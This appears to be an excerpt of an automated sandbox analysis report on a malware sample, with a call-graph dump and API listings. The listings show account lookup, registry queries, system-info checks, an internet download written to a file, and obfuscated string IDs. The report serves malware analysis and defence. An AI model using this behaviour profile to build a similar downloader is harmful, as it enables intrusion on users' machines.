33662->33664 33665 8798b0 2 API calls 33663->33665 33664->33658 33664->33662 33665->33666 33666->33374 33671 868170 ListArray 33667->33671 33675 8680a5 ListArray 33667->33675 33668 868237 34178 879890 RtlAllocateHeap RtlAllocateHeap 33668->34178 33669 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33669->33675 33672 868210 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33671->33672 33673 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33671->33673 33672->33422 33674 868241 33673->33674 33675->33668 33675->33669 33675->33671 33706 49f0cae 33676->33706 33677 8661bf LookupAccountNameA 33678 866212 33677->33678 33679 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33678->33679 33680 866226 33679->33680 33681 865d40 2 API calls 33680->33681 33682 866231 33681->33682 34179 8621c0 33682->34179 33684 866249 ListArray 33685 8664b7 33684->33685 33686 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33684->33686 33687 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33685->33687 33688 8662b2 33686->33688 33689 8664bc 33687->33689 33690 865d40 2 API calls 33688->33690 33691 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33689->33691 33692 8662bd 33690->33692 33702 866463 33691->33702 33694 8621c0 4 API calls 33692->33694 33693 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33695 8664c6 33693->33695 33705 8662d7 ListArray 33694->33705 33696 8663d2 33697 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33696->33697 33699 86641c 33697->33699 33698 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33698->33705 33700 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 
API calls 33699->33700 33700->33702 33701 865d40 2 API calls 33701->33705 33702->33693 33703 86648f __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33702->33703 33703->33400 33704 8621c0 4 API calls 33704->33705 33705->33685 33705->33689 33705->33696 33705->33698 33705->33701 33705->33704 33706->33677 33708 866821 33707->33708 33719 866548 ListArray 33707->33719 33709 866844 33708->33709 33710 8668e3 33708->33710 33711 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33709->33711 34218 879890 RtlAllocateHeap RtlAllocateHeap 33710->34218 33713 866863 ListArray 33711->33713 33714 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33713->33714 33716 8668b9 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33713->33716 33715 8668ed 33714->33715 33716->33410 33717 879750 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33717->33719 33719->33708 33719->33710 33719->33713 33719->33717 34217 87a910 RtlAllocateHeap RtlAllocateHeap __InternalCxxFrameHandler std::_Rethrow_future_exception 33719->34217 33721 867916 Concurrency::details::QuickBitSet::Grow 33720->33721 33722 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33721->33722 33765 867a68 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33721->33765 33723 867947 33722->33723 33724 865d40 2 API calls 33723->33724 33725 867952 33724->33725 33726 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33725->33726 33727 867974 33726->33727 33728 865d40 2 API calls 33727->33728 33730 86797f ListArray 33728->33730 33729 867a26 ListArray 33731 867a53 GetNativeSystemInfo 33729->33731 33736 867a57 33729->33736 33730->33729 33732 867e38 33730->33732 33731->33736 33733 
8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33732->33733 33762 867b2c 33733->33762 33734 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33735 867e42 33734->33735 33737 867b94 33736->33737 33738 867abf 33736->33738 33736->33765 33740 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33737->33740 33739 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33738->33739 33741 867ae0 33739->33741 33742 867bc0 33740->33742 33743 865d40 2 API calls 33741->33743 33744 865d40 2 API calls 33742->33744 33745 867ae7 33743->33745 33746 867bc7 33744->33746 33748 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33745->33748 33747 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33746->33747 33749 867bdf 33747->33749 33750 867aff 33748->33750 33751 865d40 2 API calls 33749->33751 33752 865d40 2 API calls 33750->33752 33753 867be6 33751->33753 33754 867b06 33752->33754 33755 865e90 5 API calls 33753->33755 33756 865e90 5 API calls 33754->33756 33757 867bf7 33755->33757 33758 867b1b 33756->33758 33759 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33757->33759 34219 89a1e1 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 33758->34219 33761 867c12 33759->33761 33763 865d40 2 API calls 33761->33763 33762->33734 33762->33765 33764 867c19 33763->33764 34220 865860 RtlAllocateHeap RtlAllocateHeap __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 33764->34220 33765->33408 33767 867c28 33768 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33767->33768 33769 867c63 33768->33769 33770 865d40 2 API calls 33769->33770 33771 867c6a 33770->33771 33772 879090 
Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33771->33772 33773 867c82 33772->33773 33774 865d40 2 API calls 33773->33774 33775 867c89 33774->33775 33776 865e90 5 API calls 33775->33776 33777 867c9a 33776->33777 33778 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33777->33778 33779 867cb5 33778->33779 33780 865d40 2 API calls 33779->33780 33781 867cbc 33780->33781 34221 865860 RtlAllocateHeap RtlAllocateHeap __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 33781->34221 33783 867ccb 33784 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33783->33784 33785 867d06 33784->33785 33786 865d40 2 API calls 33785->33786 33787 867d0d 33786->33787 33788 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33787->33788 33789 867d25 33788->33789 33790 865d40 2 API calls 33789->33790 33791 867d2c 33790->33791 33792 865e90 5 API calls 33791->33792 33793 867d3d 33792->33793 33794 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33793->33794 33795 867d58 33794->33795 33796 865d40 2 API calls 33795->33796 33797 867d5f 33796->33797 34222 865860 RtlAllocateHeap RtlAllocateHeap __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 33797->34222 33800 8644d4 33799->33800 33801 864547 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 33800->33801 33802 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33800->33802 33801->33415 33802->33801 33804 867eb5 Concurrency::details::QuickBitSet::Grow 33803->33804 33805 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 
33804->33805 33808 867ed3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 33804->33808 33806 867eec 33805->33806 33807 865d40 2 API calls 33806->33807 33809 867ef7 33807->33809 33808->33419 33810 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33809->33810 33811 867f19 33810->33811 33812 865d40 2 API calls 33811->33812 33815 867f24 ListArray 33812->33815 33813 867fc7 ListArray 33813->33808 33816 867ff4 GetNativeSystemInfo 33813->33816 33814 86803c 33817 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33814->33817 33815->33813 33815->33814 33816->33808 33818 868041 33817->33818 34223 895780 33819->34223 33821 865ee4 RegOpenKeyExA 33822 865f17 RegQueryValueExA 33821->33822 33823 865f41 RegCloseKey 33821->33823 33822->33823 33824 865f67 33823->33824 33824->33824 33825 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33824->33825 33827 865f7f ListArray 33825->33827 33826 865fe7 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33826->33466 33827->33826 33828 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33827->33828 33829 866012 33828->33829 33833 879491 __InternalCxxFrameHandler 33830->33833 33834 8794bc 33830->33834 33831 8795b0 34226 87a900 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33831->34226 33833->33491 33834->33831 33835 8795ab 33834->33835 33837 879537 33834->33837 33838 879510 33834->33838 34225 862380 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::SchedulerBase::Initialize 33835->34225 33836 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33844 8795ba std::_Rethrow_future_exception 33836->33844 33842 87ea77 Hash 2 
API calls 33837->33842 33845 879521 std::_Rethrow_future_exception 33837->33845 33838->33835 33840 87951b 33838->33840 33841 87ea77 Hash 2 API calls 33840->33841 33841->33845 33842->33845 33843 8795f1 ListArray 33843->33491 33844->33843 33846 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33844->33846 33845->33836 33848 879592 ListArray 33845->33848 33847 87960c 33846->33847 33848->33491 33850 878e0b 33849->33850 33862 878ef4 ListArray std::_Rethrow_future_exception 33849->33862 33851 878f81 33850->33851 33854 878ea1 33850->33854 33855 878e7a 33850->33855 33861 878e8b std::_Rethrow_future_exception 33850->33861 33850->33862 34227 87a900 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33851->34227 33853 878f86 34228 862380 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::SchedulerBase::Initialize 33853->34228 33859 87ea77 Hash 2 API calls 33854->33859 33854->33861 33855->33853 33858 87ea77 Hash 2 API calls 33855->33858 33857 878f8b 33858->33861 33859->33861 33860 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33860->33851 33861->33860 33861->33862 33862->33503 33863->33514 33864->33517 33865->33523 33867 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33866->33867 33868 8744f2 33867->33868 33869 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33868->33869 33870 874504 33869->33870 33871 868050 2 API calls 33870->33871 33872 87450d 33871->33872 33873 874766 33872->33873 33888 874518 ListArray 33872->33888 33874 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33873->33874 33875 874777 33874->33875 33876 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33875->33876 33878 87478c 33876->33878 33877 8748c3 34230 
879890 RtlAllocateHeap RtlAllocateHeap 33877->34230 33880 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33878->33880 33881 874730 ListArray 33880->33881 33882 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33881->33882 33883 87489e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33881->33883 33885 8748cd 33882->33885 33883->33472 33886 875003 ListArray 33885->33886 33887 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33885->33887 33889 875079 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33886->33889 33891 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33886->33891 33890 87492c 33887->33890 33888->33877 33888->33881 33900 879090 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33888->33900 33917 879750 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33888->33917 34229 87a910 RtlAllocateHeap RtlAllocateHeap __InternalCxxFrameHandler std::_Rethrow_future_exception 33888->34229 33889->33472 33892 865d40 2 API calls 33890->33892 33893 8750da 33891->33893 33894 874933 33892->33894 33897 866160 6 API calls 33893->33897 33895 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33894->33895 33896 874945 33895->33896 33898 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33896->33898 33899 875135 33897->33899 33901 874957 33898->33901 33902 8664d0 2 API calls 33899->33902 33900->33888 33903 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33901->33903 33910 875145 ListArray 33902->33910 33906 874978 33903->33906 33904 8751fe ListArray 33905 8678b0 9 API calls 33904->33905 33908 87520d 33905->33908 33909 
879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33906->33909 33907 876d66 33911 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33907->33911 33912 8644b0 2 API calls 33908->33912 33913 874990 33909->33913 33910->33904 33910->33907 33914 876d89 33911->33914 33915 87521a 33912->33915 33916 865d40 2 API calls 33913->33916 33918 867e50 3 API calls 33915->33918 33919 874997 33916->33919 33917->33888 33920 875226 33918->33920 33921 868050 2 API calls 33919->33921 33922 8644b0 2 API calls 33920->33922 33923 8749a3 33921->33923 33924 875233 33922->33924 33925 874c29 33923->33925 33927 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33923->33927 33932 8644b0 2 API calls 33924->33932 33926 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33925->33926 33996 8750bc 33925->33996 33929 874c4f 33926->33929 33928 8749bf 33927->33928 33930 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33928->33930 33931 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33929->33931 33934 8749d7 33930->33934 33935 874c64 33931->33935 33933 875250 33932->33933 33936 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33933->33936 33937 865d40 2 API calls 33934->33937 33938 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33935->33938 33939 87526e 33936->33939 33940 8749de 33937->33940 33941 874c76 33938->33941 33942 865d40 2 API calls 33939->33942 33943 868050 2 API calls 33940->33943 33947 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33941->33947 33944 875275 33942->33944 33945 8749ea 33943->33945 33946 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33944->33946 33945->33925 33949 879090 
Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33945->33949 33948 87528a 33946->33948 33950 874c97 33947->33950 33951 865d40 2 API calls 33948->33951 33952 874a07 33949->33952 33953 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33950->33953 33954 875291 33951->33954 33955 865d40 2 API calls 33952->33955 33956 874caf 33953->33956 33957 865e90 5 API calls 33954->33957 33961 874a0f 33955->33961 33958 865d40 2 API calls 33956->33958 33968 8752a3 33957->33968 33959 874cb6 33958->33959 33960 868050 2 API calls 33959->33960 33962 874cc2 33960->33962 33963 87509e 33961->33963 33964 874a5b 33961->33964 33967 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33962->33967 33974 874f90 ListArray 33962->33974 34234 879890 RtlAllocateHeap RtlAllocateHeap 33963->34234 33966 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33964->33966 33981 874a79 ListArray 33966->33981 33970 874cde 33967->33970 33971 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33968->33971 33969 8750a3 33972 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33969->33972 33973 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33970->33973 33987 87530c 33971->33987 33976 8750a8 33972->33976 33977 874cf6 33973->33977 33974->33886 33975 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33974->33975 33975->33886 33979 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33976->33979 33980 865d40 2 API calls 33977->33980 33978 874aed ListArray 33982 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33978->33982 33984 8750ad 33979->33984 33985 874cfd 33980->33985 33981->33969 33981->33978 33983 874b06 33982->33983 33986 865d40 2 API calls 33983->33986 34235 87d829 
RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::SchedulerBase::Initialize 33984->34235 33989 868050 2 API calls 33985->33989 33998 874b0e 33986->33998 33990 879470 2 API calls 33987->33990 33992 874d09 33989->33992 33993 875378 33990->33993 33991 8750b7 34236 879890 RtlAllocateHeap RtlAllocateHeap 33991->34236 33992->33974 33997 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33992->33997 33995 878df0 2 API calls 33993->33995 34005 8753d7 33995->34005 34237 87d869 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::SchedulerBase::Initialize 33996->34237 34000 874d26 33997->34000 34001 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33998->34001 34003 865d40 2 API calls 34000->34003 34010 874b69 ListArray 34001->34010 34002 8750c6 34004 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34002->34004 34011 874d2e 34003->34011 34006 8750cb 34004->34006 34014 875455 ListArray 34005->34014 34238 87a330 2 API calls 5 library calls 34005->34238 34009 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34006->34009 34008 874bdd ListArray 34008->33925 34231 8693c0 2 API calls 4 library calls 34008->34231 34009->33974 34010->33976 34010->34008 34011->33991 34012 874d7a 34011->34012 34015 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34012->34015 34018 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34014->34018 34022 874d98 ListArray 34015->34022 34016 874bf5 34016->33925 34232 898ba3 RtlAllocateHeap __dosmaperr 34016->34232 34027 87551d ListArray 34018->34027 34019 874bfe 34233 89a0d9 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 34019->34233 34020 874e0c ListArray 34021 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34020->34021 34024 
874e25 34021->34024 34022->34002 34022->34020 34026 865d40 2 API calls 34024->34026 34025 874c1d 34025->33925 34025->33984 34031 874e2d 34026->34031 34028 8644b0 2 API calls 34027->34028 34029 8755bd 34028->34029 34030 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34029->34030 34032 8755d7 34030->34032 34033 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34031->34033 34034 865d40 2 API calls 34032->34034 34039 874e88 ListArray 34033->34039 34035 8755e2 34034->34035 34036 8644b0 2 API calls 34035->34036 34038 8755f7 34036->34038 34037 874efc ListArray 34040 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34037->34040 34041 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34038->34041 34039->34006 34039->34037 34042 874f17 34040->34042 34043 87560b 34041->34043 34045 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34042->34045 34044 865d40 2 API calls 34043->34044 34046 875616 34044->34046 34047 874f2c 34045->34047 34048 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34046->34048 34049 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34047->34049 34050 875634 34048->34050 34051 874f47 34049->34051 34052 865d40 2 API calls 34050->34052 34053 865d40 2 API calls 34051->34053 34054 87563f 34052->34054 34055 874f4e 34053->34055 34056 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34054->34056 34058 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34055->34058 34057 87565d 34056->34057 34059 865d40 2 API calls 34057->34059 34060 874f87 34058->34060 34061 875668 34059->34061 34062 8744b0 11 API calls 34060->34062 34063 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34061->34063 34062->33974 34064 875686 34063->34064 
34065 865d40 2 API calls 34064->34065 34066 875691 34065->34066 34067 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34066->34067 34068 8756af 34067->34068 34069 865d40 2 API calls 34068->34069 34070 8756ba 34069->34070 34071 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34070->34071 34072 8756d8 34071->34072 34073 865d40 2 API calls 34072->34073 34074 8756e3 34073->34074 34075 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34074->34075 34076 875701 34075->34076 34077 865d40 2 API calls 34076->34077 34078 87570c 34077->34078 34079 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34078->34079 34080 87572a 34079->34080 34081 865d40 2 API calls 34080->34081 34082 875735 34081->34082 34083 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34082->34083 34084 875751 34083->34084 34085 865d40 2 API calls 34084->34085 34086 87575c 34085->34086 34087 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34086->34087 34088 875773 34087->34088 34089 865d40 2 API calls 34088->34089 34090 87577e 34089->34090 34091 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34090->34091 34092 875795 34091->34092 34093 865d40 2 API calls 34092->34093 34094 8757a0 34093->34094 34095 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34094->34095 34096 8757bc 34095->34096 34097 865d40 2 API calls 34096->34097 34098 8757c7 34097->34098 34099 8799b0 2 API calls 34098->34099 34100 8757db 34099->34100 34101 8798b0 2 API calls 34100->34101 34102 8757ef 34101->34102 34103 8798b0 2 API calls 34102->34103 34104 875803 34103->34104 34105 8798b0 2 API calls 34104->34105 34106 875817 34105->34106 34107 8799b0 2 API calls 34106->34107 34108 87582b 34107->34108 34109 8798b0 2 API calls 34108->34109 34110 87583f 34109->34110 34111 
8799b0 2 API calls 34110->34111 34112 875853 34111->34112 34113 8798b0 2 API calls 34112->34113 34114 875867 34113->34114 34115 8799b0 2 API calls 34114->34115 34116 87587b 34115->34116 34117 8798b0 2 API calls 34116->34117 34118 87588f 34117->34118 34119 8799b0 2 API calls 34118->34119 34120 8758a3 34119->34120 34121 8798b0 2 API calls 34120->34121 34122 8758b7 34121->34122 34123 8799b0 2 API calls 34122->34123 34124 8758cb 34123->34124 34125 8798b0 2 API calls 34124->34125 34126 8758df 34125->34126 34127 8799b0 2 API calls 34126->34127 34128 8758f3 34127->34128 34129 8798b0 2 API calls 34128->34129 34130 875907 34129->34130 34131 8799b0 2 API calls 34130->34131 34132 87591b 34131->34132 34133 8798b0 2 API calls 34132->34133 34134 87592f 34133->34134 34135 8799b0 2 API calls 34134->34135 34136 875943 34135->34136 34137 8798b0 2 API calls 34136->34137 34138 875957 34137->34138 34139 8798b0 2 API calls 34138->34139 34140 87596b 34139->34140 34141 8798b0 2 API calls 34140->34141 34142 87597f 34141->34142 34143 8799b0 2 API calls 34142->34143 34148 875993 ListArray 34143->34148 34144 876627 34146 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34144->34146 34145 87677b 34147 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34145->34147 34149 87663d 34146->34149 34150 876790 34147->34150 34148->34144 34148->34145 34152 865d40 2 API calls 34149->34152 34151 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34150->34151 34153 8767a5 34151->34153 34154 876648 34152->34154 34239 864940 RtlAllocateHeap RtlAllocateHeap ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 34153->34239 34156 8799b0 2 API calls 34154->34156 34167 87665c __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 34156->34167 34157 8767b4 34158 878df0 2 API calls 34157->34158 34165 8767fb 34158->34165 34159 8768f6 34160 

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00866200
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AccountLookupName
                                                                                                      • String ID: CLTk8G==$ELNk8G==$NrSd6xKm
                                                                                                      • API String ID: 1484870144-3685683383
                                                                                                      • Opcode ID: a658f59b18339a892a15298a4aa158c8a0073f9a14f43e7efa46e7a0239948a5
                                                                                                      • Instruction ID: d747a6f1b245c956711d5dab5f45a20ded26ef506b5ef42fe6c83c7c5e41f092
                                                                                                      • Opcode Fuzzy Hash: a658f59b18339a892a15298a4aa158c8a0073f9a14f43e7efa46e7a0239948a5
                                                                                                      • Instruction Fuzzy Hash: B591A3B1A001189BDB29DB28CC85BDDB779FB45304F4085E9E519D7281EB349AC4CFA9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0086B447
                                                                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0086B47E
                                                                                                      • InternetReadFile.WININET(00000000,00000000,?,?), ref: 0086B48F
                                                                                                      • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 0086B4B2
                                                                                                      • InternetReadFile.WININET(00000000,00000000,?,?), ref: 0086B4BD
                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0086B4CA
                                                                                                      • InternetCloseHandle.WININET(?), ref: 0086B4D9
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0086B4DC
                                                                                                      • InternetOpenW.WININET(008BAD34,00000000,00000000,00000000,00000000,DDFB3AB0), ref: 0086B6ED
                                                                                                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0086B711
                                                                                                      • HttpOpenRequestA.WININET(?,00000000), ref: 0086B75A
                                                                                                      • HttpSendRequestA.WININET(?,00000000), ref: 0086B81A
                                                                                                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 0086B8CC
                                                                                                      • InternetCloseHandle.WININET(?), ref: 0086B9A7
                                                                                                      • InternetCloseHandle.WININET(?), ref: 0086B9AF
                                                                                                      • InternetCloseHandle.WININET(?), ref: 0086B9B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Internet$Close$FileHandle$OpenRead$HttpRequest$ChangeConnectCreateFindNotificationSendWrite
                                                                                                      • String ID: 4AJS7teoFA==$4AJS7xCZFC =$Nx1LPq==
                                                                                                      • API String ID: 2953698585-3681961738
                                                                                                      • Opcode ID: d7e0e7c75681c9af51cfbfac4847a1c32194fbafa574c76cbcfde23bc9e13eda
                                                                                                      • Instruction ID: 274a5801e222fc93967ddaf13ba1a9e996d6d40d1ca47ba0a3a120618f1b1a56
                                                                                                      • Opcode Fuzzy Hash: d7e0e7c75681c9af51cfbfac4847a1c32194fbafa574c76cbcfde23bc9e13eda
                                                                                                      • Instruction Fuzzy Hash: 3D721471A001089BEF18DF68CC85BEEBB75FF45314F508158E819EB296DB359AC0CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Legend: Executed / Not Executed
                                                                                                      • [Control-flow graph image not preserved; first listed block: 8a30dc-8a310c]
                                                                                                      APIs
                                                                                                        • Part of subcall function 008A2D95: CreateFileW.KERNELBASE(00000000,00000000,?,008A3185,?,?,00000000,?,008A3185,00000000,0000000C), ref: 008A2DB2
                                                                                                      • __dosmaperr.LIBCMT ref: 008A31F7
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 008A3203
                                                                                                      • __dosmaperr.LIBCMT ref: 008A3216
                                                                                                      • __dosmaperr.LIBCMT ref: 008A33BC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __dosmaperr$File$CreateType
